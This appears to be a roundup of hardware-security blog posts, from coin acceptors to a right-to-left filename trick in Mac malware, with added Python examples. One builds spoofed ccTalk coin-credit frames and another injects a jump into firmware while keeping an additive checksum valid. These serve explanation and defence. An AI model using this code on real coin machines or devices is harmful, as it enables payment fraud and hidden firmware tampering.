Hacking Coin Collection

Coin Acceptor

Devices that collect coins for payment typically use standardized coin acceptors like the one shown here. These devices speak a serial protocol called ccTalk to tell the host system which coins were inserted. [Balda] has built tools for implementing the ccTalk protocol so you can play around with the devices, and he also gave a talk at DEF CON (PDF) about the protocol.

[Balda] got started with ccTalk because he wanted to add a coin acceptor to a MAME cabinet and had one on hand. His latest project converts ccTalk coin events into standard keyboard keystrokes using a Teensy; the MAME cabinet then interprets those keystrokes and adds to the player’s credits.

There are two interesting sides to this project. By providing tools to work with ccTalk, it is much easier to take a used coin acceptor off eBay and integrate it into your own projects. On the other hand, these acceptors are used everywhere, and the same tools could let you spoof coin events on the bus, or even change settings on the acceptor.
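As an added example (this is not [Balda]'s code), here is the ccTalk framing in Python: a frame is destination address, data length, source address, header, data bytes and an 8-bit checksum chosen so that every byte of the frame sums to zero modulo 256. The header numbers used (254 for a simple poll, 229 for "read buffered credit or error codes", 0 for a device reply) are from the public generic ccTalk specification as I recall it and are an assumption of this example; the "spoofed" credit reply is constructed here to show what a fake coin event looks like on the wire.

```python
# Added example, not [Balda]'s tools: build, check and decode ccTalk frames.
# Frame layout: [dest][data_len][src][header][data...][checksum]
# Checksum: the 8-bit value that makes the whole frame sum to 0 modulo 256.
# Header values below are assumed from the generic ccTalk spec.
CCTALK_HOST = 1              # conventional host address
SIMPLE_POLL = 254            # header: device answers with an empty reply (ACK)
READ_BUFFERED_CREDIT = 229   # header: read the last five credit/error events
REPLY = 0                    # header 0 is used for every reply from a device


def checksum(body: bytes) -> int:
    """8-bit additive checksum: (body + checksum) % 256 == 0."""
    return (-sum(body)) & 0xFF


def build_frame(dest: int, src: int, header: int, data: bytes = b"") -> bytes:
    body = bytes([dest, len(data), src, header]) + bytes(data)
    return body + bytes([checksum(body)])


def parse_frame(raw: bytes) -> dict:
    """Validate length and checksum, then split the frame into its fields."""
    if len(raw) < 5 or len(raw) != 5 + raw[1]:
        raise ValueError("length field does not match frame size")
    if sum(raw) & 0xFF != 0:
        raise ValueError("checksum mismatch")
    return {"dest": raw[0], "src": raw[2], "header": raw[3], "data": raw[4:-1]}


def frame_ok(raw: bytes) -> bool:
    try:
        parse_frame(raw)
        return True
    except ValueError:
        return False


def decode_buffered_credit(data: bytes):
    """Reply payload to header 229: an event counter followed by five
    (result A, result B) pairs, newest first. A credit event has A = coin
    position (1..16) and B = sorter path; A == 0 marks an error with B as
    the error code, and (0, 0) is the null event."""
    if len(data) != 11:
        raise ValueError("expected 11 data bytes")
    counter, events = data[0], []
    for a, b in zip(data[1::2], data[2::2]):
        if a == 0 and b == 0:
            continue
        events.append(("credit", a, b) if a else ("error", b))
    return counter, events


def spoofed_credit_reply(device_addr: int, counter: int, coin_position: int, sorter_path: int) -> bytes:
    """A reply claiming one fresh credit. Nothing in the plain protocol ties
    this frame to the real acceptor: a correct checksum is all the host checks."""
    data = bytes([counter, coin_position, sorter_path]) + bytes(8)
    return build_frame(CCTALK_HOST, device_addr, REPLY, data)


if __name__ == "__main__":
    print("poll ->", build_frame(2, CCTALK_HOST, SIMPLE_POLL).hex())
    fake = spoofed_credit_reply(2, counter=5, coin_position=3, sorter_path=1)
    print("spoofed reply ->", fake.hex())
    print("host decodes:", decode_buffered_credit(parse_frame(fake)["data"]))
```

The spoofed reply is the whole security point: the host only checks that the addresses and the 8-bit checksum are right, so anything that can drive the serial bus can report a coin that was never inserted, and the same framing carries the configuration headers that change the acceptor's settings.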

Just Swipe Your Card And Enter The Pin… What Could Go Wrong?

We do hope this project makes you shiver.

“Financial risks” is an audiovisual installation that reacts when you swipe your credit card and prints an odd-looking receipt if you type in your PIN code. Even though the website contains few technical details (read: none) about the build, we chose to feature the project because we find the intent interesting:

‘Financial Risks’ installation is a project designed to present an ironical viewpoint on encoded wallets, as a data input interface invites to overcome fear of impossibility to control spread of confidential information for the sake of curiosity of interaction with an object of art.

The piece consists of 6 bank card readers, a hardware system of sound and video synthesis, a keyboard for pin code entering, a 2-channel sound system and a cash register printer configured to print images. Up to 6 cards simultaneously may be used for playing.

We do hope that nothing is stored in the platform’s memory… but is the installation monitored?

Dead Drop Concept Inspired By [Ender Wiggin] Family


[Tyler Spilker’s] DDD project is a Digital Dead Drop system based on Python and a Raspberry Pi as a server. It’s pretty rough around the edges at this point — which he freely admits. But we like the concept and figure it might spark an interesting conversation in the comments section.

Now by far our favorite dead drop concept is this USB drive lewdly sticking out of a brick wall. But you actually need to be on-site where this drive is mortared into the wall in order to access it. [Tyler] instead developed a webpage that gives him a text box to enter his messages. These are encrypted using key pairs and pushed to his remote RPi server. This way he can write down his thoughts knowing they’re stored securely and never in danger of being accessed from a lost or stolen cellphone. Keep in mind that the plaintext still exists on whatever device the text box is typed on, so the protection is for the notes at rest on the server, not for a phone that is compromised while a note is being written.

If free thought isn’t what you’re trying to transfer from one place to another you probably want something like a Pirate Box.

[Sprite_TM] OHM2013 Talk: Hacking Hard Drive Controller Chips

Even if he hadn’t done any firmware hacking on this hard drive, [Sprite_TM’s] digital exploration of the controller is fascinating. He gave a talk at this year’s Observe, Hack, Make (OHM2013), a non-commercial, community-run event in the Netherlands, and we can’t wait for the video. But all the information on how he hacked into the three-core controller chip is included in his write-up.

[Sprite_TM] mentions that you’re not going to find datasheets for the controllers on these drives. He got his foot in the door after finding a JTAG pinout mentioned on a forum post. The image above shows his JTAG hardware which he’s controlling with OpenOCD. This led him to discover that there are three cores inside the controller, each used for a different purpose. The difference between [Sprite_TM’s] work and that of mere mortals is that he has a knack for drawing surprisingly accurate conclusions from meager clues. To see what we mean check out the memory map for the second core which he posted on page 3 of his article.

Using JTAG he was able to inject a jump into the code (along with a filler word to keep the checksum valid) and run his own code. To begin the firmware hacking portion of the project he pulled the flash ROM off of the board and installed it on that little board sticking out on the left. This made it easy for him to back up and reflash the chip. Eventually this let him pull off the same proof of concept as a firmware-only hack (no JTAG necessary). He goes on to detail how an attacker who has root access could flash hacked firmware which compromises data without any indication to the system admin or user. But we also like his suggestion that you should try this out on your broken hard drives to see if you can reuse the controllers for embedded projects. That idea is a ton of fun!
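The "filler word to keep the checksum valid" trick is worth seeing in code. The following is an added example, not from [Sprite_TM]'s write-up, and it assumes two things the write-up does not state: that the firmware checksum is a plain 32-bit additive word sum, and that the patched core executes 32-bit ARM code (so the jump is an ARM `B` instruction). The image, offsets and addresses are constructed for the example.

```python
# Added example (not [Sprite_TM]'s code): overwrite one word of a firmware image
# with a branch to injected code, then fix a spare "filler" word so an additive
# 32-bit word-sum checksum comes out unchanged. Assumptions: additive checksum,
# little-endian 32-bit ARM, and a filler word that is never executed or read.
import struct

MASK32 = 0xFFFFFFFF


def arm_branch(from_addr: int, to_addr: int) -> int:
    """Encode an unconditional 32-bit ARM 'B' (condition AL). The 24-bit
    immediate is the word offset from the pipeline PC, i.e. from_addr + 8."""
    offset = to_addr - (from_addr + 8)
    if offset % 4:
        raise ValueError("branch target must be word aligned")
    if not -0x2000000 <= offset < 0x2000000:
        raise ValueError("branch target out of the +/-32 MiB range of B")
    return 0xEA000000 | ((offset >> 2) & 0xFFFFFF)


def word_sum(image: bytes) -> int:
    """Assumed checksum scheme: sum of all little-endian 32-bit words mod 2**32."""
    if len(image) % 4:
        raise ValueError("image is not a whole number of words")
    return sum(struct.unpack("<%dI" % (len(image) // 4), image)) & MASK32


def read_word(image: bytes, off: int) -> int:
    return struct.unpack_from("<I", image, off)[0]


def inject_jump(image: bytes, load_addr: int, hook_off: int, target_addr: int, filler_off: int) -> bytes:
    """Replace the word at hook_off with a branch to target_addr and adjust the
    word at filler_off by the opposite amount, so word_sum() is unchanged."""
    if hook_off == filler_off or hook_off % 4 or filler_off % 4:
        raise ValueError("hook and filler must be distinct, word-aligned offsets")
    img = bytearray(image)
    old_hook = read_word(img, hook_off)
    old_fill = read_word(img, filler_off)
    new_hook = arm_branch(load_addr + hook_off, target_addr)
    delta = (new_hook - old_hook) & MASK32          # how much the sum would move
    struct.pack_into("<I", img, hook_off, new_hook)
    struct.pack_into("<I", img, filler_off, (old_fill - delta) & MASK32)  # move it back
    return bytes(img)


# Constructed stand-in for a firmware image: 64 words of recognisable bytes.
SAMPLE_IMAGE = bytes(range(256))


def demo() -> bytes:
    """Hook the word at 0x40 (image loaded at 0) to jump to code at 0x8000,
    using the word at 0xFC as the filler."""
    return inject_jump(SAMPLE_IMAGE, load_addr=0, hook_off=0x40, target_addr=0x8000, filler_off=0xFC)


if __name__ == "__main__":
    patched = demo()
    print("checksum before: %08x after: %08x" % (word_sum(SAMPLE_IMAGE), word_sum(patched)))
    print("hook word now: %08x" % read_word(patched, 0x40))
```

Because the checksum is just a sum, any single patch can be cancelled by one filler word; a CRC or a signed image would defeat this, which is the reason signed firmware matters for the root-access attack described above.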

When we were poking around the OHM2013 website (linked above) we noticed that the tickets are sold out; good for them! But if you were still able to buy them they take Bitcoin as one payment option. Are there any other conferences that allow Bitcoin for registration?

Blackhat: iOS Device Charger Exploit Installs And Activates Malware


A team of researchers from Georgia Tech unveiled their findings yesterday at the Blackhat conference. Their topic is a power charger exploit that installs malware on iOS devices. Who would have thought that there’d be a security hole associated with the charging port on a device? Of course, that port is also the device’s USB data port. And after seeing hotel room locks exploited through their power jack, this is an avenue that should be examined for any device.

The demonstration used a charger built around a BeagleBoard. Plugging in the charger is not enough to trigger the exploit; the user must unlock the screen while charging for it to go into action. But once that’s done the game is over. Their demo removes the Facebook app and replaces it with an infected impostor while leaving the icon in the same place on your home screen. They notified Apple of their findings and a patch will roll out with iOS 7. So when would you plug your device into an untrusted charger? Their research includes a photo from an airport where an iPad is connected to the USB port of a public charging station.

The summary on the Blackhat site has download icons for the white paper and presentation slides. At the time of writing we had a hard time getting them to download but succeeded after several tries.

Trust Hacking: How The Bitcoin System Works


[Scott Driscoll] sent us a link to his Bitcoin explanation a couple of weeks ago. We glanced at it but moved on rather quickly. It’s been popping up here and there and we finally gave it the time it deserved. This video is interesting in that it doesn’t just focus on what a Bitcoin actually is, but on how the Bitcoin system works when it comes time for money to change hands.

Quite early on in the explanation he mentions that “The Bitcoin system is amazingly designed so that no trust is needed”. That’s a powerful statement. For instance, if you sell your car, one of your friends will probably tell you not to take a check. That’s because a check means you’re trusting that the buyer actually has a balance in their account to cover the transaction. With Bitcoin the transaction carries its own proof that the money is available: it references the outputs of the earlier transactions through which those Bitcoins were acquired, it is signed with the private key matching the address those outputs paid to, and every node on the network checks that those outputs have not already been spent.

If you have some idea of what public/private key pairs are you’re already equipped to understand [Scott’s] lecture. After you make it through the 22 minute video maybe you should get down to work doing some Bitcoin mining at home.
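To make the "carries its own proof" idea concrete, here is an added toy ledger (not code from [Scott Driscoll]'s video): each input names an earlier unspent output, is signed by the key whose hash that output paid to, and the validator rejects unknown or already-spent outputs, mismatched keys, bad signatures and overspends. Real Bitcoin signs with ECDSA over secp256k1; to stay standard-library only, this example swaps in a SHA-256 Lamport one-time signature, which is an assumption of the example and not part of the protocol. The amounts and parties are constructed for the demo.

```python
# Added example, not from the video. Toy UTXO ledger with signed inputs.
# Assumption: Lamport one-time signatures stand in for Bitcoin's ECDSA.
import hashlib
import os


def H(*parts: bytes) -> bytes:
    h = hashlib.sha256()
    for p in parts:
        h.update(p)
    return h.digest()


def keygen():
    """Lamport key: 256 pairs of random secrets; public key is their hashes."""
    sk = [(os.urandom(32), os.urandom(32)) for _ in range(256)]
    return sk, [(H(a), H(b)) for a, b in sk]


def sign(sk, msg: bytes):
    d = int.from_bytes(H(msg), "big")
    return [sk[i][(d >> (255 - i)) & 1] for i in range(256)]


def verify(pk, msg: bytes, sig) -> bool:
    d = int.from_bytes(H(msg), "big")
    return all(H(sig[i]) == pk[i][(d >> (255 - i)) & 1] for i in range(256))


def address(pk) -> bytes:
    """Pay-to-pubkey-hash style: an output locks coins to the hash of a key."""
    return H(b"".join(a + b for a, b in pk))


class Tx:
    def __init__(self, inputs, outputs):
        self.inputs = inputs      # dicts with txid, index, pk, sig
        self.outputs = outputs    # (amount, address) pairs

    def payload(self) -> bytes:
        """What is signed and hashed: the outpoints spent and the outputs created."""
        body = [i["txid"] + i["index"].to_bytes(4, "big") for i in self.inputs]
        body += [amt.to_bytes(8, "big") + addr for amt, addr in self.outputs]
        return b"".join(body)

    def txid(self) -> bytes:
        return H(self.payload())


def make_payment(sk, pk, outpoint, outputs) -> Tx:
    inp = {"txid": outpoint[0], "index": outpoint[1], "pk": pk, "sig": None}
    tx = Tx([inp], outputs)
    inp["sig"] = sign(sk, tx.payload())
    return tx


class Ledger:
    def __init__(self):
        self.utxo = {}            # (txid, index) -> (amount, address)

    def add_coinbase(self, amount: int, addr: bytes) -> Tx:
        tx = Tx([], [(amount, addr)])
        self.utxo[(tx.txid(), 0)] = (amount, addr)
        return tx

    def validate(self, tx: Tx):
        total_in, seen = 0, set()
        for inp in tx.inputs:
            key = (inp["txid"], inp["index"])
            if key in seen or key not in self.utxo:
                return False, "input unknown or already spent"
            seen.add(key)
            amount, addr = self.utxo[key]
            if address(inp["pk"]) != addr:
                return False, "key does not match the address that was paid"
            if not verify(inp["pk"], tx.payload(), inp["sig"]):
                return False, "bad signature"
            total_in += amount
        if sum(a for a, _ in tx.outputs) > total_in:
            return False, "outputs exceed inputs"
        return True, "ok"

    def apply(self, tx: Tx):
        ok, why = self.validate(tx)
        if ok:
            for inp in tx.inputs:
                del self.utxo[(inp["txid"], inp["index"])]
            for idx, out in enumerate(tx.outputs):
                self.utxo[(tx.txid(), idx)] = out
        return ok, why


def demo():
    """An honest payment, then a double spend, a theft attempt and an overspend."""
    alice_sk, alice_pk = keygen()
    change_sk, change_pk = keygen()   # Lamport keys are one-time, so change goes to a fresh key
    bob_sk, bob_pk = keygen()
    mallory_sk, mallory_pk = keygen()
    ledger = Ledger()
    coinbase = ledger.add_coinbase(50, address(alice_pk))
    pay = make_payment(alice_sk, alice_pk, (coinbase.txid(), 0),
                       [(30, address(bob_pk)), (20, address(change_pk))])
    results = [ledger.apply(pay)]
    # Alice tries to spend the same coinbase output a second time.
    results.append(ledger.apply(make_payment(alice_sk, alice_pk, (coinbase.txid(), 0),
                                             [(50, address(change_pk))])))
    # Mallory tries to spend Bob's output with her own key.
    results.append(ledger.apply(make_payment(mallory_sk, mallory_pk, (pay.txid(), 0),
                                             [(30, address(mallory_pk))])))
    # Bob signs correctly but tries to create more than he owns.
    results.append(ledger.apply(make_payment(bob_sk, bob_pk, (pay.txid(), 0),
                                             [(31, address(mallory_pk))])))
    return results


if __name__ == "__main__":
    for ok, why in demo():
        print("accepted" if ok else "rejected", "-", why)
```

Every check in `validate` is something any node can do from the transaction and its own copy of the unspent-output set, which is what "no trust is needed" comes down to; what the toy leaves out is the part of the video about mining, where the network agrees on which of two conflicting transactions came first.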

Mac Malware Uses Right To Left Character Exploit


Check out this jumbled confirmation window. At first glance the message appears to contain a bunch of gibberish, but it can actually be read if you start at the right side and read each character moving left. The text displays like this because it is prefixed by the special Right-to-Left Override Unicode character (U+202E). The technique is being used in malware to obscure the actual extension of the file being launched: the file system sees the real extension, while the reversed rendering shows the user something else. Notice that when written backwards your eye can still pick out the string “pdf”, which may be enough to trick the uninitiated into approving the launch of the file.

This confirmation screen is launched when clicking on a piece of malware found in the wild a little over a week ago. If you do choose to run it, a decoy PDF file is opened in order not to arouse suspicion. But at the same time the program, which is signed with an Apple Developer ID, is installing itself in the home directory and making a cron job to launch at each boot. Sneaky! Note that the Developer ID signature only says whose certificate signed the code, not that the code is benign, so Gatekeeper’s signing check is no defense here.
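A check worth having in any file-upload or mail-attachment pipeline is below, as an added example that is not part of the original post: it finds Unicode direction-override characters in a filename, recovers the extension the OS will actually honour, and approximates the name as a user sees it. The rendering is a deliberate simplification of the Unicode bidi algorithm (only an RLO run is reversed), which is enough for filenames that are otherwise plain left-to-right text. The sample names are constructed for the example and are not the real malware's filename.

```python
# Added example, not from the original post: flag filenames that hide their
# real extension behind a right-to-left override.
RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE: text after it is drawn reversed
PDF = "\u202c"   # POP DIRECTIONAL FORMATTING: ends the override run
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM",
}


def bidi_controls_in(name: str):
    """(position, short name) for every bidi control character in the string."""
    return [(i, BIDI_CONTROLS[c]) for i, c in enumerate(name) if c in BIDI_CONTROLS]


def real_extension(name: str) -> str:
    """Extension the OS uses: drop the invisible controls, take the text after the last dot."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[1].lower() if "." in clean else ""


def displayed_name(name: str) -> str:
    """Approximate rendering: characters between RLO and PDF (or end of string)
    are shown reversed; other control characters are invisible. Simplified bidi."""
    out, i = [], 0
    while i < len(name):
        c = name[i]
        if c == RLO:
            end = name.find(PDF, i + 1)
            run = name[i + 1 : end if end != -1 else len(name)]
            out.append("".join(ch for ch in run if ch not in BIDI_CONTROLS)[::-1])
            i = len(name) if end == -1 else end + 1
        else:
            if c not in BIDI_CONTROLS:
                out.append(c)
            i += 1
    return "".join(out)


def displayed_extension(name: str) -> str:
    shown = displayed_name(name)
    return shown.rsplit(".", 1)[1].lower() if "." in shown else ""


def is_disguised(name: str) -> bool:
    """True when an override makes the apparent extension differ from the real one."""
    return bool(bidi_controls_in(name)) and displayed_extension(name) != real_extension(name)


def scan(names):
    """Summary per filename: what the user sees versus what will actually run."""
    return [{"raw": n, "shown_as": displayed_name(n), "real_ext": real_extension(n),
             "controls": bidi_controls_in(n), "disguised": is_disguised(n)} for n in names]


# Constructed samples (not the malware's actual filename): an .app disguised as a .pdf
# and an ordinary document.
SAMPLES = ["RecentNews." + RLO + "fdp.app", "quarterly-report.pdf"]

if __name__ == "__main__":
    for row in scan(SAMPLES):
        print(row)
```

The practical rule this encodes: strip or reject bidi control characters in filenames at the boundary, and never let the rendered string decide what handler opens a file.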